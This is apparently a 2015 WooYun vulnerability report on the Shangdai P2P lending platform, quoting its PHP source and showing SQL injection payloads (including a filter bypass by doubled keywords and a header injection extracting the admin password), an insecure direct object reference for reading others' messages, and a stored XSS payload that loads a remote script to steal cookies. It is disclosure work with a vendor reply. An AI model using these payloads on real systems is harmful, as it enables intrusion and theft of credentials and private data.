当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(27) 关注此漏洞

缺陷编号: WooYun-2015-142675

漏洞标题: 尚贷p2p网贷系统二处sql注入/越权/xss(demo成功)

相关厂商: shangdaixitong.com

漏洞作者: 牛肉包子

提交时间: 2015-09-22 17:10

公开时间: 2015-12-22 14:16

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: php源码审核

5人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-22: 细节已通知厂商并且等待厂商处理中
2015-09-23: 厂商已经确认,细节仅向厂商公开
2015-09-26: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2015-11-17: 细节向核心白帽子及相关领域专家公开
2015-11-27: 细节向普通白帽子公开
2015-12-07: 细节向实习白帽子公开
2015-12-22: 细节向公众公开

简要描述:

只求个首页。
还是有安全狗。但是还是没什么卵用。

详细说明:

注入1(测试不成功)



看到代码core\deayou.core.php 65-86行处

code 区域
elseif ($_G['query_site'] == 'home') 
{
$user_id = $_REQUEST['user_id'];
if ($user_id == '')
{
$user_id = $_G['user_id'];
}
$_G['article_id'] = $user_id;
$magic->assign('_G', $_G);
usersClass::AddVisit(array('user_id' => $user_id, 'visit_userid' => $_G['user_id']));
if ($home_dir != '')
{
$magic->template_dir = $home_dir;
$magic->assign('tpldir', '/' . $home_dir);
$magic->display($home_template);
}
else
{
$magic->display('home.html');
}
die;
}





然后继续更近

code 区域
/**
* 最近来访
* @param $param array('user_id' => '会员ID')
* @return bool true/false
*/
public static function AddVisit($data = array()) {
global $mysql;
if (isset($data['visit_userid']) && $data['visit_userid'] != "" && $data['user_id'] != $data['visit_userid']) {
$time = time();
$ip = ip_address();
$sql = "select id from `{users_visit}` where user_id={$data['user_id']} and visit_userid = {$data['visit_userid']}";
$result = $mysql->db_fetch_array($sql);
//判断是否
if ($result != false) {
$sql = "update `{users_visit}` set addtime='{$time}',addip='{$ip}' where id='{$result['id']}'";
$mysql->db_query($sql);
} else {
$sql = "insert into `{users_visit}` set user_id='{$data['user_id']}',visit_userid='{$data['visit_userid']}',addtime='{$time}',addip='{$ip}'";
$mysql->db_query($sql);
}
//如果超过10条,则删除最早的一条
$sql = "select count(1) as num from `{users_visit}` where user_id={$data['user_id']}";
$result = $mysql->db_fetch_array($sql);
if ($result['num'] > 20) {
$sql = "select id from `{users_visit}` where user_id={$data['user_id']} order by addtime asc";
$result = $mysql->db_fetch_array($sql);
$sql = "delete from `{users_visit}` where id='{$result['id']}'";
$mysql->db_query($sql);
}
}
}





其中user_id没有被单引号包裹,所以造成注入。



然后有个全局过滤sql的函数。



code 区域
function inject_check($sql_str) 
{
$sql = array('select', 'insert', '\\\'', '\\/\\*', '\\.\\.\\/', '\\.\\/', 'union', 'into', 'load_file', 'outfile');
$sql_re = array('', '', '', '', '', '', '', '', '', '', '', '');
return str_replace($sql, $sql_re, $sql_str);
}





写两次就绕过了。然后也使安全狗失效了。



code 区域
http://**.**.**.**/?home&user_id=updatexml(1,concat(1,(seselectlect+database())),1)



QQ截图20150921224445.jpg







注入二



modules/message/message.inc.php

code 区域
elseif ($_U['query_type'] == "senteds"){	

if (isset($_POST['type']) && $_POST['type']==2){

$data['id'] = $_POST['id'];
$data['sent_user'] = $_G['user_id'];
$data['sented'] = 0;
$result = messageClass::update($data);
if ($result!==true){
$msg = array($MsgInfo[$result],"",$_U['query_url']);
}else{
$msg = array("操作成功");
}

}else{
/* $data['sent_user'] = $_G['user_id'];
$data['page'] = $_U['page'];
$data['epage'] = $_U['epage'];
$data['sented'] = 1;
$result = messageClass::GetList($data);
if (is_array($result)){
$pages->set_data($result);
$_U['message_list'] = $result['list'];
$_U['show_page'] = $pages->show(3);
}else{
$msg = array($result,"",$_U['query_url']);
} */
if (isset($_REQUEST['id']) ){
$data['id'] = $_REQUEST['id'];
$data['user_id'] = $_G['user_id'];
$result = messageClass::DeleteMessageReceive($data);
if ($result>0){
$msg = array("删除成功","","/?user&q=code/message");
}else{
$msg = array($MsgInfo[$result]);
}
}else{
$msg = array("请选中再进行操作");
}
}
}





然后跟进DeleteMessageReceive函数

code 区域
function DeleteMessageReceive($data = array()){
global $mysql;

if (!IsExiest($data['id'])) return "message_receive_id_empty";
if (is_array($data['id'])){
$data['id'] = join(",",$data['id']);
}
$_sql = " where id in ({$data['id']})";
if (isset($data['user_id']) && $data['user_id']!=""){
$_result = self::GetMessageReceiveOne($data);

$_sql .= " and user_id='{$data['user_id']}' and type='user'";
$sql = "delete from `{message_receive}` {$_sql}";
$mysql -> db_query($sql);
if ($_result['type']!='user'){
$sql = "delete from `{message_receive}` where user_id='{$data['user_id']}' and receive_value='{$data['id']}'";
$mysql -> db_query($sql);
}
return $data['user_id'];
}else{
$sql = "delete from `{message_receive}` {$_sql}";
$mysql -> db_query($sql);
}
return $data['id'];
}



可以看到$id可以注入





code 区域
http://**.**.**.**/?user&q=code/message/sentdeled

id%5B0%5D=8) or updatexml(1,concat(1,(seselectlect+user())),1&type=1





QQ截图20150921224807.jpg





modules/message/message.inc.php

code 区域
elseif ($_U['query_type'] == "sentdeled"){	
if (isset($_REQUEST['id']) ){
$data['id'] = $_REQUEST['id'];
$data['user_id'] = $_G['user_id'];
$result = messageClass::DeleteMessage($data);
if ($result>0){
$msg = array($MsgInfo["message_action_success"],"","/?user&q=code/message/sented");
}else{
$msg = array($MsgInfo[$result]);
}
}else{
$msg = array("请选中再进行操作");
}
}



跟进

code 区域
function DeleteMessage($data = array()){
global $mysql;

if (!IsExiest($data['id'])) return "message_id_empty";
if (is_array($data['id'])){
$data['id'] = join(",",$data['id']);
}
$_sql = " where id in ({$data['id']})";
if (isset($data['user_id']) && $data['user_id']!=""){
$_sql .= " and user_id='{$data['user_id']}' ";
}
$sql = "delete from `{message}` {$_sql}";
$mysql -> db_query($sql);
return 1;
}



然后id也可以注入



code 区域
http://**.**.**.**/?user&q=code/message/senteds


id%5B0%5D=8) or updatexml(1,concat(1,(seselectlect+user())),1&type=1





QQ截图20150921225144.jpg





注入3

code 区域
function ip_address() 
{
if(!empty($_SERVER["HTTP_CLIENT_IP"]))
{
$ip_address = $_SERVER["HTTP_CLIENT_IP"];
}
else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))
{
$ip_address = array_pop(explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']));
}
else if(!empty($_SERVER["REMOTE_ADDR"]))
{
$ip_address = $_SERVER["REMOTE_ADDR"];
}
else
{
$ip_address = '';
}
return $ip_address;
}





然后

code 区域
public static function AddVisit($data = array()) {
global $mysql;
if (isset($data['visit_userid']) && $data['visit_userid'] != "" && $data['user_id'] != $data['visit_userid']) {
$time = time();
$ip = ip_address();
$sql = "select id from `{users_visit}` where user_id={$data['user_id']} and visit_userid = {$data['visit_userid']}";
$result = $mysql->db_fetch_array($sql);
//判断是否
if ($result != false) {
$sql = "update `{users_visit}` set addtime='{$time}',addip='{$ip}' where id='{$result['id']}'";
$mysql->db_query($sql);
} else {
$sql = "insert into `{users_visit}` set user_id='{$data['user_id']}',visit_userid='{$data['visit_userid']}',addtime='{$time}',addip='{$ip}'";
$mysql->db_query($sql);
}
//如果超过10条,则删除最早的一条
$sql = "select count(1) as num from `{users_visit}` where user_id={$data['user_id']}";
$result = $mysql->db_fetch_array($sql);
if ($result['num'] > 20) {
$sql = "select id from `{users_visit}` where user_id={$data['user_id']} order by addtime asc";
$result = $mysql->db_fetch_array($sql);
$sql = "delete from `{users_visit}` where id='{$result['id']}'";
$mysql->db_query($sql);
}
}
}





这儿存在注入

设置X-FORWARED-FOR为

code 区域
xxx' or EXP(~(select * from (select password from tuanshang_users_admin limit 1)a)) or '



QQ截图20150921225349.jpg







注入5



code 区域
http://**.**.**.**/?user&q=code/message/sent



发送信息的时候

QQ截图20150921225509.jpg









越权



任意读取站内信



code 区域
http://**.**.**.**/?user&q=code/message/viewed&id=1





其中变换id的值就行了。



QQ截图20150921225727.jpg





QQ截图20150921225919.jpg







xss



在发送私信处存在xss。简单的fuzz了一下。然后成功绕过过滤。



在内容处构造

code 区域
<input onfocus=$.getScript("http://**.**.**.**/sPGu9l?1442846067") autofocus>





成功获取cookie



QQ截图20150921230133.jpg







QQ图片20150921230201.png

漏洞证明:

QQ截图20150921225509.jpg



QQ截图20150921225144.jpg







QQ截图20150921225727.jpg





QQ截图20150921225919.jpg





QQ截图20150921230133.jpg







QQ图片20150921230201.png

修复方案:

过滤+转义

版权声明:转载请注明来源 牛肉包子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-09-23 14:15

厂商回复:

感谢白帽们的辛苦,该漏洞为V3演示系统所存在的问题,我们将所述问题进行排查修复,同时我们将加强安全漏洞排查,将安全问题放到首位,欢迎对我们的系统安全性继续监督,我们的成长离不开大家的指导和帮助。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):
登陆后才能进行评分
0%
100%
0%
0%
0%

评价

  1. 2015-09-22 17:14 | %270x5c ( 实习白帽子 | Rank:72 漏洞数:26 | 乌拉拉)
    0

    膜拜

  2. 2015-09-22 17:15 | sco4x0 ( 实习白帽子 | Rank:31 漏洞数:14 | 身高两米)
    0

    献上膝盖

  3. 2015-09-22 17:20 | 牛 小 帅 ( 普通白帽子 | Rank:1470 漏洞数:351 | 1.乌云最帅的男人 ...)
    0

    牛肉包子

  4. 2015-09-22 20:06 | 小震 ( 路人 | Rank:8 漏洞数:3 | ~)
    0

    这个牛逼。。

  5. 2015-12-22 22:18 | 情痴 ( 实习白帽子 | Rank:38 漏洞数:12 | 乌云最菜的菜鸟)
    0

    膜拜大神

  6. 2015-12-23 09:31 | 风若新 ( 普通白帽子 | Rank:228 漏洞数:61 | 爱生活,爱安全,爱攻防。)
    0

    膜拜大神

登录后才能发表评论,请先 登录

ation;